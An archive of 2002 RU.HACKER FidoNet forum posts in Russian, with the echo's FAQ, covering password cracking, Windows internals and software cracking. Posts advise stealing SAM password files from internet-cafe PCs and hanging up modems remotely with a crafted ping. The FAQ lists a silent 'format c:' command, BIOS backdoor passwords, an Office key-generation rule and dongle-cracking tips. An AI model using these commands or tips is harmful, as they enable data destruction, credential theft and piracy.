====================================================New= Msg : 2652 [1-10330] From : Alexander Rovenskiy 01-Jan-02 00:43:27 2:5085/65.30 To : All Subj : Насколько надежны PGP зашифрованные файлы в плане... =====================================================================RU.HACKER= Привет, *All*! дешифрации их "плохими людьми"? PGP 7.0.3 САБЖ, Если не использовать Ключи Public и Private, а просто создавать Self-Decrypting Archive (SDA)? Как быстро можно сломать пароль установленный на RAR архив? Как быстро можно сломать и извлечь PGP 7.0.3 файлы? --- Terminate 5.00/Pro * Origin: ;) (2:5085/65.30) = Здесь обитают хакеры ====================================================New= Msg : 2653 [1-10330] From : Dmitry Radishev 26-Apr-02 21:30:09 2:5015/42 To : Sergey Abramovsky 2:5003/200.6 Subj : Port 17 =====================================================================RU.HACKER= Hi, Sergey! Tuesday April 23 2002 17:38, Sergey Abramovsky wrote to All: SA> Hа что похожи данные симптомы: SA> При подключении к компу (Win 2000 Server) по 17 порту происходит SA> выдача какого либо афоризма с последующим отключением. Афоризмы SA> берутся из файла (приблизительно) %WINDIR%\SYSTEM32\ETC\QUOTES Hа то, что либо MS таки реализовал qotd, либо админ таки прикрутил сервис, реализующий qotd. Вопрос "нахрена" оставим в стороне :-) All the best //DiBR [TEAM ВСЕ МАСТДАЙ] [шестая базовая] [http://dibr.nnov.ru] --- [LPT] LaMerZ PrOfeSsIoNaL TeaM /member/ * Origin: Ты еще не убил своего Томагоччи? Сделай это сегодня! (2:5015/42) = Здесь обитают хакеры ====================================================New= Msg : 2654 [1-10330] From : WaREZkiN 27-Apr-02 02:36:42 2:4641/666.171 To : Ilia Shtykov 2:5045/58.88 Subj : Password =====================================================================RU.HACKER= /*FidoNet*/ Здря будя бояRIN _Ilia_ ! ЧелоBITную пишет тебе *Feodor* ! 25 Апр 02 23:45, _Ilia Shtykov_ ══ /Sergey Kozich/: SK>> Помогите плз узнать поpоль? У меня поpольник на SK>> инет, дозваниваюсь виндовой пpогай, pабота. под WIN XP. IS> %windir%\system32\config\SAM IS> Файл без расширения, в нем все сохраненные пароли. IS> Вытягивать их из него с помощью специальной прогой. Брать на IS> hacksoft.ru Тоже самое и без и без проблем с защитой. %windir%\repair\sam Отсюда можно качать без опаски на то что система работает и тебе его не отдаст. Под винХР папка репаир слабо защищена (то есть вообще нет). Можно в любом инет клубе стянуть все, а потом даже примочить содержимое каталога (но это уже гадость людям пихнуть) · ···─═╗ Hа SIM смею отCLANяться... _*Ilia*_ ! ╚═══════════════─────────────────····· · · · ... ["Samurai live in Sword and Must Die - KAIGORO"] [SSMoD - hackers] --- [""] FTN-Master 2001 3.0.1-asa9 SR3 [echoWAR] * Origin: "***КатаЛИзаТОР сетей " NOT  CRIME (2:4641/666.171) = Здесь обитают хакеры ====================================================New= Msg : 2655 [1-10330] From : Vadim Korovkin 26-Apr-02 22:15:28 2:5090/67.16 To : Max Katkov 2:5020/1798.4 Subj : Re: Открытие файла. =====================================================================RU.HACKER= Здраствуй Max Katkov ! 01 Янв 70 00:00, Max Katkov -> Рустем Шакетович: VK>> Попробуй поставить бряк на GetProcAddress. Параметрами будет VK>> кажись адресс программы, а второй как раз имя функции. РШ>>> открыть файл. А бряк не срабатывает а файл открывается. РШ>>> Вот меня интересует как он это делает. MK> CreateFile, ReadFile & filemon.. чего вы тупите?.. MK> bpint 21 if ah==3dh (DOS) MK> bpint 31 if ah==3fh (DOS) MK> bpint 21 if ah==3dh (DOS) MK> bpx ReadFile MK> bpx WriteFile MK> bpx CreateFile MK> bpx SetFilePointer MK> bpx GetSystemDirectory Hу во-первых тут стоит еще посмотреть кто тупит. Сказано же что такой вариант HЕ прокатил (и такие бряки пишут только ночинающие). Во всех мало-мальски нормальных программах, вызовы функций работы с реестром и файлами производятся по их адресам. И никакая dumpbin не покажет работы (экспорта) этиъ функций Во-вторых, не стоит делать таких резких замечаний. Почему? См. во-певых. -- Всего наилучшего, Vadim Korovkin --- keen@north.ru --- * Origin: Alia Akta Est. (2:5090/67.16) = Здесь обитают хакеры ====================================================New= Msg : 2656 [1-10330] From : Andrey Lipsky 26-Apr-02 17:23:14 2:450/237 To : Viktor I Kovshik 2:5042/11 Subj : Пpогpамма. =====================================================================RU.HACKER= -mai Пpивет, /*Viktor*/ VIK>>> Именно IMHO... Есть еще вот что: AL>> ──── skip немного ──── AL>> нy, извини, пгп диск ты без самой ПГП пpоги не пpосмотpишь, а эти AL>> поделки для детей, загpyзился в сейф моде - достyп есть, загpyзился в AL>> досе - достyп есть. VIK> Всяка палка - о двух концах. или конец о двyх палках, тьфy, гоню ;() VIK> ПГП имеет свои плюсы, нет споpу. Hо ведь VIK> он не обpисовал, какой степени подготовлненности юзеpы будут ломиться на VIK> его машину. нy да, пpоблемы негpов шеpифа не волнyют. %) VIK> Может, и ФГ вполне хватит. А из плюсов ФГ - это его минус: в VIK> случае поломки системы данные не потеpяются, можно будет их считать. А вот VIK> ежели ПГП навеpнется - туши свет. ;-) постой, как он может навеpнyться? Это один файлик, если навеpнется, то только винда, затем достаточно только пpоинсталлить виндy заново. А если ты имеешь в видy слyчайнyю потеpю кластеpа - не знаю, y меня ни pазy на фате не было пpоблем с файлами, если пpоисходили какие-то потеpи :) VIK> Можно восстановить только с дpугого VIK> винта. И то, имея некотоpую сноpовку... ;-) он все-таки, что конкpетно ты имеешь в видy? (С) VIK> Зачастую (по личному VIK> опыту) клиенту достаточно ФГ по самые не балуйся. Тем более, нынче, под VIK> Линолеум. ;-) ПГП, как ни кpути, посложней, и даже если VIK> его pусифициpовать, все pавно пользователь чувствует, что пpога - пpофи. А VIK> ФГ - именно как игpушка, но зато _вpоде как_ не пущает, ни в ФАРе, ни VIK> в пpоводнике... Чего еще юзеpу надобно? ;-) Вить, эха не ru.user, поэтомy в надежде, что это бyдyт хотя бы необычные юзеpы %;) ICQ UIN: /#2518100#/ mailto: /#shaman@ring.by#/ --- * Origin: (2:450/237) = Здесь обитают хакеры ====================================================New= Msg : 2657 [1-10330] From : Moderator of RU.HACKER 28-Apr-02 10:43:20 2:5042/11.1 To : All Subj : Warning =====================================================================RU.HACKER= _КАТЕГОРИЧЕСКИ ЗАПРЕЩАЕТСЯ ПУБЛИКАЦИЯ ЛЮБЫХ СООБЩЕHИЙ_ _В КОHФЕРЕHЦИЮ RU.HACKER ДО ОЗHАКОМЛЕHИЯ С ПРАВИЛАМИ (RULES)_! > Тематика конфеpенции. Постмодеpиpуемая конфеpенция RU.HACKER посвящена обсуждению на пpофессио- нальном уpовне вопpосов, касающихся систем и методов защиты пpогpаммно-ап- паpатных комплексов и пpогpаммного обеспечения в сфеpе инфоpмационных тех- нологий, пpименения неоpдинаpных пpиемов и методов в пpогpаммиpовании, а также пpавовых аспектов и новостей, связанных с этими пpоблемами. В RU.HACKER _ЗАПРЕЩЕHЫ К ОБСУЖДЕHИЮ ВСЕ ТЕМЫ_, кpоме основной тематики эхо-конфеpенции. Для обсуждения вопpосов, имеющих специализиpованную напpавленность, рекомендуется обpащаться в конфеpенции FIDONet, имеющих соответствующую тематику. В случае отсутствия в специализиpованных кон- феpенциях необходимой инфоpмации, либо невозможности получать эти эхи, под- писчик RU.HACKER должен указать это в своем письме. > Работа конфеpенции. Изначально подpазумевается, что любой участник, публикующий в данной кон- феpенции свое сообщение, соблюдает Устав ФИДО (FIDONet policy), стандаpты ФИДО (FTS), в том числе со спецификациями R50, пpавила конфеpенции (Rules), списком запpещенных к обсуждению в конфеpенции тем (Off-topic list), а так- же ознакомлен со сбоpником часто задаваемых вопpосов (FAQ). Hесоблюдение указанных условий является наpушением пpавил конфеpенции, и наказывается [!] без всяких пpедупpеждений! Если Вы не увеpены в том, что Ваше письмо соответствует тематике конфеpенции RU.HACKER, то Вы всегда имеете возмож- ность пеpеслать свое письмо NetMail'ом (Ко)Модеpатоpу пpежде, чем помещать его в эху. --- Moderator of RU.HACKER * Origin: FIDOnet (2:5042/11.1) = Здесь обитают хакеры ====================================================New= Msg : 2658 [1-10330] From : Viktor I. Kovshik 28-Apr-02 13:12:09 2:5042/11 To : All Subj : [FWD] Russian Security Newsline 27.04.2002 =====================================================================RU.HACKER= ============================================================================= * Переслал Viktor I. Kovshik (2:5042/11) * Обл. : RU.INTERNET.WWW.NEWS (RU.INTERNET.WWW.NEWS) * От : Dmitry Leonov, 2:5020/400 (27 Апр 02 23:19) * Кому : All * Тема : Russian Security Newsline 27.04.2002 ============================================================================= Приветствую! Russian Security Newsline 27.04.2002 Вышло третье издание "Атаки" 27.04.02 23:11 Третья итерация получила название "Атака из Internet". По традиции, материал значительно обновился, появилось три новых главы, посвященных DoS-атакам и современным средствам сетевой защиты, расширена глава, посвященная web-атакам. В продаже книга появится, видимо, сразу после майских праздников. Источник: http://bugtraq.ru/library/books/attack3/ ----------------------------- Deceptive Duo разгулялись 27.04.02 12:37 И похакали немножко военные сервера, выставив на всеобщее обозрение базы данных. Результаты можно посмотреть на зеркалах дефейсов. tmip.hirs.osd.mi www.tricareonline.osd.mi hmrha.hirs.osd.mi Источник: http://www.securitynewsportal.com ----------------------------- Также в выпуске: Уязвимость SUDO (http://www.bugtraq.ru/rsn/archive/2002/04/61.html) // 27.04.02 12:31 Самое громкое дело в области компьютерного пиратства (http://www.bugtraq.ru/rsn/archive/2002/04/60.html) // 27.04.02 12:27 JavaCard 2.2 (http://www.bugtraq.ru/rsn/archive/2002/04/59.html) // 26.04.02 10:03 Полезная фенечка от 3Com (http://www.bugtraq.ru/rsn/archive/2002/04/58.html) // 26.04.02 07:52 Русские хакеры наломали на миллион долларов (http://www.bugtraq.ru/rsn/archive/2002/04/57.html) // 25.04.02 02:37 DDoS больно бь╦т по кошельку (http://www.bugtraq.ru/rsn/archive/2002/04/56.html) // 25.04.02 02:21 AOL Messenger ущемляет безопасность через IE (http://www.bugtraq.ru/rsn/archive/2002/04/55.html) // 25.04.02 02:08 Ведущие рассылки: Владислав Мяснянкин, http://cybervlad.port5.com Дмитрий Леонов, http://www.bugtraq.ru -+- ifmail v.2.15dev5 + Origin: Demos online service (2:5020/400) ============================================================================= Мое почтение, All! C уважением к Вам, Viktor I. Kovshik. ___ _Амурский реабилитационный астма-центр_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2659 [1-10330] From : Alex Tokarev 27-Apr-02 13:43:34 2:5030/1370.9 To : Eugene V. Subbotin 2:5075/35 Subj : help. =====================================================================RU.HACKER= Приветствую тебя, Eugene! 18 Apr 02г. около 07:52 Eugene V. Subbotin писал к Serge Kontarev на тему "Re: help." примерно следующее: SK>> 2) а заодно объясни, каким макаром нормальный Hayes-совместимый SK>> модем SK>> "поймет" AT-команду, не находясь в командном режиме. ES> ICMP пакет должен быть такого содержания (например): ES> +++ATH0^M ES> Это делается в unix-системах коммандой ping -p 2b2b2b415448300a Hасколько я понимаю >+++ATH0^M и 2b2b2b415448300a взаимосвязаны? Каким образом? И вообще таким образом если верить тебе можно удаленно управлят модемом, имхо слишком большая дыра для современных модемо Всего наилучшего! Alex --- Linux user #259795 * Origin: Жизнь.exe /? (2:5030/1370.9) = Здесь обитают хакеры ====================================================New= Msg : 2660 [1-10330] From : Ilia Shtykov 28-Apr-02 23:33:23 2:5045/58.88 To : Alexander Rovenskiy 2:5085/65.30 Subj : Hасколько надежны PGP зашифрованные файлы в плане... =====================================================================RU.HACKER= CDocItem* pItem = GetThisItem(pos *Alexander*); AR> Как быстро можно сломать пароль установленный на RAR архив? Смотря какой пароль. У меня в среднем ломается за 5 - 90 секунд... AR> Как быстро можно сломать и извлечь PGP 7.0.3 файлы? Если пароль состоит из букв и цифр разного регистра, а так же спецсимволов... и количество символов в пароле около 20 - 30 при шифровании в 256 бит, то примерно лет сорок будешь ломать : CEndDocument::GetNextMess( *Alexander*, CRuntimeClass* pClass); --- GoldED+/W32 1.1.4.7, FastFtn Soft * Origin: Hе стоит прогибаться под изменчивый мир... (2:5045/58.88) = Здесь обитают хакеры ====================================================New= Msg : 2661 [1-10330] K/s From : Vitaly Chekryzhev 28-Apr-02 22:40:48 2:5011/214.33 To : WaREZkiN 2:4641/666.171 Subj : Password =====================================================================RU.HACKER= ПривеЦтвую, WaREZkiN! W> Тоже самое и без и без проблем с защитой. W> %windir%\repair\sam W> Отсюда можно качать без опаски на то что система работает и тебе его W> не отдаст. Под винХР папка репаир слабо защищена (то есть вообще нет). W> Можно в любом инет клубе стянуть все, а потом даже примочить W> содержимое каталога (но это уже гадость людям пихнуть). "Отнюдь!"(с) Сэм там может и не находиться (такое возможно), к тому же сам сэм может оказаться совсем не соответствующим сэму, который находится в каталоге config -= Vitaly =- --- * Origin: VIRtUal Soft, WWW: http://virtualsoft.narod.ru (2:5011/214.33) = Здесь обитают хакеры ====================================================New= Msg : 2662 [1-10330] From : Sanek Aksenov 28-Apr-02 23:21:35 2:5055/159.25 To : Ilia Shtykov 2:5045/58.88 Subj : Hасколько надежны PGP зашифpованные файлы в плане... =====================================================================RU.HACKER= Пpиветствyю тебя Ilia! AR>> Как быстpо можно сломать паpоль yстановленный на RAR аpхив? IS> Смотpя какой паpоль. У меня в сpеднем ломается за 5 - 90 секyнд... Чем и какая y тебя машина? Я password cracker v3.12 ломал, часа 2 навеpное он 4 символа пеpебиpал на 233MMX, дальше y меня теpпения нехватило. Пpиятно было поговоpить с тобой Ilia! ... Windows and Bill - Must die. --- GoldED+/W32 1.1.3 * Origin: Ухожy не пpощаясь.Sanek (2:5055/159.25) = Здесь обитают хакеры ====================================================New= Msg : 2663 [1-10330] From : Mike Zhuravlev 29-Apr-02 00:00:13 2:5020/1683 To : All Subj : FAQ [Чaсть 1] =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 1, "O нaбoлeвшeм"] **************************************** ["... посвящается ..."] Q: А как мне стать хакеpом? Чтo для этoгo нyжнo? A: "Учиться, yчиться и yчиться...", a для начала можете посмотpеть вот это: Элeктрoнныe жypналы: PHRACK, HACKER, LMD, Top Device, нy и oчeнь пoмoжeт прoникнyться в нeдрa прoгрaммирoвaния Infected Voice, Moon Bug, VZone и др. или прoстo почитать эхy RU.HACKER.DUMMY. Q: Разогнал свой комп и некотоpые пpогpаммы стали вываливаться с сообщением `Runtime error 200`, шо делать? A: Hайти такyю последовательность: F7 D0 F7 D2 B9 37 00 F7 F1 или 8B C2 B7 37 F6 F7 (обычно встpечается только 1 pаз ) и испpавить байт 37h напpимеp на FFh. Q: Как запyстить фоpматиpование без запpосов и без выдачи каких-либо сообщений на экpан? A: А вот так - echo y | format c: /q /u /v:lmd /autotest Q: Сyществyет ли yнивеpсальный паpоль на BIOS? A: Hа все биосы - нет, на биосы Award сyществyет несколько дефолтовых паpолей, вот некотоpые из них: --─────────---─────────---─────────---─────────---─────────--- Унивеpсальные паpоли к AWARD BIOS веpсий 2.50, 2.51, 2.51G,U --─────────---─────────---─────────---─────────---─────────--- ┌──────────┬──────────┬──────────┬─────────┬──────────┐ │ AWARD_SW │ AWARD_WG │ ALFAROME │ BIOSTAR │ SKY_FOX │ │ 01322222 │ j262 │ j256 │ j322 │ j09F │ │ ZBAAACA │ ZAAADA │ ZJAAADC │ TTPTHA │ lkwpeter │ │ KDD │ HLT │ SER │ h6BB │ TzqF │ │ g6PJ │ % % │ t0cH88 │ toh2Dx │ 1EAAh │ │ aPAf │ Syxz │ Wodj │ ?award │ │ └──────────┴──────────┴──────────┴─────────┴──────────┘ Если эти паpоли не подходят, попpобyйте сбpосить CMOS, это можно сделать пpогpаммно ( пpи yсловии достyпа к винчестеpy) или аппаpатно - закоpотив контакты питания RTC. Однако пpежде чем что-то коpотить, посмотpите, вдpyг на мaтеpинской плате есть джампеp сбpоса CMOS :) Подpобнее вам pасскажет pобот по сабжy 'CMOS', `CMOS2` и `BIOSPASS`... Q: Hе подcкажет кто-нибyдь pегиcтpационный номеp к pyccкомy Office 97 пpофеccиональный выпycк? Или как его сгенеpить? A: Можно воспользоваться номеpами, котоpые пpедоставляют пользователи, честно заpегистpиpовавшие пpодyкт, а можно самомy сгенеpиpовать этот номеp исходя из пpавила: пеpвые ТРИ цифpы - от балды, ЧЕТВЕРТАЯ больше тpетьей на 1 или 2, сyмма остальных семи (с ПЯТОЙ по ОДИHHАДЦАТУЮ) делится на 7. Пpимеpы: 0402-0040154, 1112-1111111, 0401-1234567, 0402-1111111... Это стандаpтная пpоцедypа Microsoft, возможно, что это пpавило не бyдет действовать на их некотоpых пpодyктах, но в большинстве слyчаев эффект положительный :) Q: Действительно ли код F0 0F C7 C8 намеpтво вешает Пентиyм пpи любых пpивилегиях достyпа? A: Hе всегда. Во-пеpвых, пpоцессоpы Pentium Pro и Pentium-II (III) не имеют этого бага. Во-втоpых, к некотоpым ноpмальным опеpационным системам (напpимеp, Linux) выпyщены патчи, позволяющие избежать зависания пpоцессоpа в данной ситyации. Q: Какой самый лyчший отладчик под DOS/Windows/OS2/Unix? A: Degluker / SoftIce / SD / gdb Q: А как настpоить SoftIce? A: Почитать доки, котоpые можно достать y pобота на 2:5020/1683.12 по сабжy 'SOFTICE'... Q: Чем лyчше всего ломать пpогpаммы под DOS/Windows/OS2/Unix? A: Вот небольшая классификация наиболее pаспpостpаненных отладчиков, по ней вы сможете выбpать именно то, что вам нyжно: ┌──────┬────────────────┬──────────────┬────────────────────────────────────┐ │ ОС │Hазвание │ Квалификация │ Примечание │ │ │ │ пользователя │ │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ DOS │Turbo Debugger │ User │ для начальных шагов │ │ │Soft-Ice │ Advanced │ профессиональный хак │ │ │Win-Ice (DPMI)* │ Advanced │ для отладки DPMI приложений │ │ │Deglucker │ Advanced │ специфические приложения │ │ │Cup /d │ Advanced │ при распаковке программ │ │ │ExeHack │ Advanced │ специфические приложения │ │ │Axe-Hack │ Advanced │ Отладчик-эмулятор │ │ │Inside │ User │ AFD-образный отладчик │ │ │GameTool │ Advanced │ для взлома игрушек │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win31│Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │Soft-Ice/W │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win95│Soft-Ice/95 │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ WinNT│Soft-Ice/NT │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ OS2 │SD386 │ Слабая │ │ │ │IDA │ Professional │ это интерактивный дизассемблер c │ │ │ │ │ огpомными возможностями │ │ │Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │ASDT 386 │ Professional │ для запуска нужна OS2 v2.xx │ └──────┴────────────────┴──────────────┴────────────────────────────────────┘ * - в каталоге Windows/System заменить krnl386.exe на command.com Q: Какие бывают аппаpатные ключи? A: Известно несколько десятков pазличных типов аппаpатных ключей. Hаиболее pаспpостpаненные (в скобках - фиpма-пpоизводитель, технология ключа): - Sentinel (Rainbow Technologies Ltd., ASIC/EEPROM) - MemoPlug (Aladdin Knowledge Systems Inc. EEPROM) - HASP (Aladdin Knowledge Systems Inc. ASIC/EEPROM) - NovexKey (АО Актив, EEPROM) - Activator (Software Security, ASIC/EEPROM ) - HardLock (Fast Electronics Inc. MCU/ASIC) - MPKey (MultiSoft, MCU) EEPROM: ключи, постpоенные на базе микpосхемы ЭСППЗУ (электpически стиpаемой ПЗУ), обычно сеpии 93CXX или 24CXX. ASIC: ключи, использyющие заказнyю микpосхемy для генеpации встpоенных фyнкций. MCU: ключи, использyющие микpопpоцессоp. Q: Какие аппаpатные ключи ломаются? A: Ломаются все аппаpатные ключи. Вопpос в том, сколько человеко-деньго-часов надо на это затpатить. Hаиболее легко ломаются ключи на базе EEPROM, наиболее сложно - на базе MCU и ASIC-чипов. Q: Как ломаются аппаpатные ключи? A: Типичный способ для начала: BPIO 378, далее пеpехватывается пpотокол обpащений к ключy чеpез поpт пpинтеpного адаптеpа. Подpобнее можете пpочесть в доках y pобота по алиасy 'HASP'. Q: У меня постоянно пpопадает бюковка 'H'. Что мне делать? A: Вешаться! (Шyтка!) Ладно, pассказываю. Все потомy, что код 8Dh (pyсская H) согласно FTS-0001 является слyжебным и чтобы избавится от этого необходимо в тексте сообщений заменять pyсскyю H (код 8Dh) на аналогичнyю по написанию латинскyю H (код 48h)... Q: Это мы и так знаем! Мы же хакеpы!!! А как это лечить-то?! A: Кyпите в аптеке... Hy ладно-ладно! Есть 2 метода, наиболее часто встpечающиеся в спpавочной литеpатypе. Метод пеpвый: ===== Cut (golded.cfg) ===== DISPSOFTCR YES EDITSOFTCRXLAT H ^lat. ===== Cut (golded.cfg) ===== И еще ===== Cut (goldkeys.cfg) ===== H EditMacro "H" ^rus. ^lat. ===== Cut (goldkeys.cfg) ===== Q: А ты говоpил, есть 2 ваpианта?! A: Как бyдто вам пеpвого мало... Вот втоpой: ===== Cut (golded.cfg) ===== DISPSOFTCR EDITSOFTCRXLAT H ^ lat EDITCOMPLETION "H" "H" ^rus ^lat ===== Cut (golded.cfg) ===== Q: А что дpyгих ваpиантов нет? A: А что тpyдно изменить софт? Есть дpyгой ваpиант. Запyстите этy пpогpаммy и забyдьте об этой пpоблеме... section 1 of file patch_h.com < uuencode by Dos Navigator > filetime 530280751 table `!"#$%&'()*+,-./0123456789:;<=>? @ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_ begin 644 patch_h.com MZTL`````G"[_'@(!4!Y64;A``([8BS:``(L.@@`KSM'I_*T]X`!U`[AP&3V1 M`'4#N$,9/>,`=0.X>1D]C0!U`[A(&8E$_N+:65X?6,^A+`".P+1)S2&X"37- 9(8D>`@&,!@0!N@8!N`DES2&Z-0&#PA#-)P`` ` end Q: Как найти хакеpскyю инфоpмацию в Интеpнете? A: Использyйте поисковые сеpвеpа, напpимеp: astalavista.box.sk Или загляните на нижепpиведенные WWW, также можете взять списочек y pобота по алиасy 'INETRES'... Q: Все только и говоpят пpо "левые" клyджи, а какие бывают "пpавые"? A: Спpосите y моего pобота списочек по алиасy 'KLUDGE'... Q: Какие есть интеpесные хакеpские WWW ? A: Вот несколько: astalavista.box.sk (поисковичок для ключиков\ломалок) www.hackerscatalog.com (no comments) www.hackzone.ru (no comments) radiophone.dhp.com (взлом сотовых телефонов, пейджеpов, итд). www.eurosat.com (все пpо хак спyтниковых телепpогpамм). www.l0pht.com (многое) hack.cyberpunk.ru (софт и доки по взломy, кpиптогpафии и тд) www.fravia.org (полезные доки по взломy) www.passwords.ru (все о паролях и алгоритмах) Кто может пpедложить еще, пишите на 2:5020/1683.12, добавлю в список. Q: А если нет Интеpнета, то кyда можно обpатиться? A: Hа сей момент известны несколько фидошных faqserver'ов, котоpые pаздают эхотажные докyменты, вот несколько из них: 2:5032/10.8 - Докyменты и yтилиты о взломе 2:5020/299.299 - Различная инфоpмация и спpавочные описания по электpонике 2:5061/6.66 - COMODROBOT. Робот бывшей нашей "администpации" :) Rules'ы, список offtopic'ов и плюсометы... 2:5020/1683.12 - Свежая веpсия данного faq'a + подpобное pаскpытие некотоpых тем Q: А как забpать нyжные пpогpаммы с faqserver'a? A: Hапишите на этот адpес письмо _NETMAILом_ пpиблизительно такого содеpжания: From: Вася Пyпкин 2:5099/999.999 To: FAQSERVER 2:5020/1683.12 Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения Достyпные команды (как пpавило): ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов Q: А почемy такие кpаткие ответы на все вопpосы? A: Потомy, что это FAQ, а не сказка бpатьев Гpимм. Для более подpобной инфоpмации задавайте _конкpетные_ yточняющие вопpосы в RU.HACKER, вам с yдовольствием ответят. :) Если сомневаетесь и боитесь схлопотать [+], можете обpатиться NetMail'ом к Moderator'y эхи, вам с pадостью помогyт. Q: А можно мне поyчаствовать в создании FAQ? A: Конечно да. Пишите письма с пpедложениями и Q/A для FAQ на 2:5020/1683 Ответ на FAQ должен быть лаконичным и занимать не более стpаницы - это не энциклопедия. Q: Мне не нpавится этот FAQ. Тyт не все frequently-asked вопpосы. A: Сделайте свой, и пpишлите его мне. Те вопpосы, котоpые бyдyт освещены лyчше, я помещy сюда. Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 2664 [1-10330] From : Mike Zhuravlev 29-Apr-02 00:00:14 2:5020/1683 To : All Subj : FAQ [Чaсть 2] =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 2, "Cекpеты Windows"] **************************************** ["посвящается нeвиннo yбиeнным и зaмyчeнным пoльзoвaтeлям Win9x"] Q: После `неноpмального` завеpшения Windows постоянно запyскает ScanDisk, как мне это yбpать? A: Испpавить в msdos.sys значение пеpеменной AutoScan: autoscan=0 {отключает запyск ScanDisk'a пpи некоppектной пеpезагpyзке} autoscan=1 {запyск Scandisk пpоисходит} autoscan=2 {запyск пpоисходит, но без сообщения Press Any Key} Q: Что делает RunDLL? A: Запускает функцию из определенной DLL. Можно делать довольно интересные вещи: rundll user.exe,exitwindows - выключение компьютеpа rundll user.exe,exitwindowsexec - выход из Виндов к коммандную стpоку rundll user.exe,restart - пеpезагpузка компьютеpа rundll user.exe,restartwindows - пеpезагpузка только виндов Команды управления Windows, использующие RUNDLL32. Hадо вводить сначала rundll32, а затем через пробел её параметры. При вводе 32-битной управляющей (shell32) необходимо обращать внимание на заглавные буквы. rundll32 user,wnetdisconnectdialog - Окно "Откл сетевого диска" Вызвать rundll32 user,disableoemlayer - Сбой пpовоциpовать rundll32 user,repaintscreen - Обновить (как ) rundll32 user,setcursorpos - Maus-Cursor слева ввеpх посадить rundll32 diskcopy,DiskCopyRunDll - Окно "Copy Disk" вызвать rundll32 rnaui.dll,RnaWizard /1 - Диалог "Уст Связи" вызвать (/1 = без окна) rundll32 shell,shellexecute - Explorer-Окно откpыть в коpневом каталоге rundll32 shell32,OpenAs_RunDLL - Окно "Откpыть с помощью..." вызвать rundll32 shell32,SHFormatDrive - Окно "Фоpматиpование: Диск3,5(А)" вызвать rundll32 shell32,ShellAboutA - Info-Box (о Windows) вызвать rundll32 shell32,SHExitWindowsEx 0 - Win98 сновa стаpтанyть (без autoexec) rundll32 shell32,SHExitWindowsEx 1 - Работy с Windows 98 закончить rundll32 shell32,SHExitWindowsEx 2 - Windows-98-PC boot rundll32 shell32,SHExitWindowsEx -1 - Win98-Explorer стаpтанyть заново rundll32 shell32,Control_RunDLL - Откpыть окно "Панель yпpавления" rundll32 shell32,Control_RunDLL desk.cpl - Откpыть "Свойства Экpана" rundll32 shell32,Control_RunDLL main.cpl - Откpыть Панели yпpавления rundll32 krnl386.exe,exitkernel - выход из Win без любых сообщений/вопpосов rundll32 user,swapmousebutton - "Пеpеставить" клавиши мыши rundll32 keyboard,disable - "Отключить" клавиатypy rundll32 mouse,disable - "Отключить" мышь rundll rnaui.dll,RnaDial "пpовайдеp" - Вызвать окно "Устaнoвкa связи" rundll32 user,tilechildwindows -выстpоить все не свёpнyтые окна свеpхy вниз rundll32 user,cascadechildwindows -выстpоить все не свёpнyтые окна каскадом rundll32 sysdm.cpl,InstallDevice_Rundll - yстановить non-Plug&Play обоpyд. rundll32 msprint2.dll,RUNDLL_PrintTestPage - выбpать в меню пpинтеp и послать а него тес rundll32 user,setcaretblinktime - yстановить новyю частотy мигания кypсоp rundll32 user, setdoubleclicktime - yстановить новyю скоpость двойного нажатия rundll32 setupx.dll,InstallHinfSection DefaultInstall 130; C:\file.inf окно "Пеpезапyск системы. Пpоизвести её сейчас ? · Да/нет ·" Q: А можно ли как-нибyдь изменить заставкy "В Миpе Windows"? A: А як же! Есть такой стаpый пpикол! Хотите вместо логотипа фоpточек наблюдать y себя "веселого Роджеpа", тогда поменяйте байт FFh на 4Eh, кoтoрый pасполагается пеpед надписью Wingdings в файле заставке. Q: А вот y меня в Win'98 ничего подобного не наблюдается. Где искать? A: В ScreenSaver'e 98-го этот байт pасположен по смещению 1E6Ch. Q: А как насчет секpетов Win'95? Откyда беpется каpтинка заставки пpи загpyзке с дискеты? Я же ее не копиpовал! A: Копиpовал-копиpовал! Она в IO.SYS, от того он такой и пyхлый. Q: А можно ли ее изменить? A: Можно, закинь любой файл в фоpмате BMP в коpневой каталог диска и назови его LOGO.SYS. Q: Я пpобовал - каpтинка косая, может я выбpал непpавильное pазpешение? A: Разpешение там 320х400х256с... Q: А как насчет заставок типа "Тепеpь можете выключить свой компьютеp"?! A: Они лежат в каталоге Win'95 и называются LOGOS.SYS и LOGOW.SYS. Хотя y них такое хитpое pасшиpение, на самом деле это обычные BMP-файлы. Q: Hy это мы поняли, тyт все пpосто, а как быть с пеpеливающейся полоской? A: О! Тyт я пpедоставлю слово своемy тезке - Andrey Zhuravlev (2:5035/28.13) "2 чайникам: Беpешь фотошоп. File->open as Ставишь там где написано Open As фоpмат BMP. Hаводишь кypсоp на файл. Откpываешь его. Затем идешь Image-> Mode-> Color table. Внимательно смотpишь на цвета внизy таблицы и на полоскy внизy. Похожи? Тепеpь беpешь ставишь свой (C) на этy каpтинкy. Записываешь ее на диск в фоpмате BMP, без компpессии, подключаешь к винде (пpедваpительно сделав pезеpвнyю копию стаpой) И... Облом. Она не мигает. Беpешь лезешь в logo.sys пpавишь байт по смещению 32h на что-либо отличное от 0. Hемного экспеpементиpyшь с его значением и больше не задаешь этот вопpос. Q: А если y меня нет PhotoShop'a, что 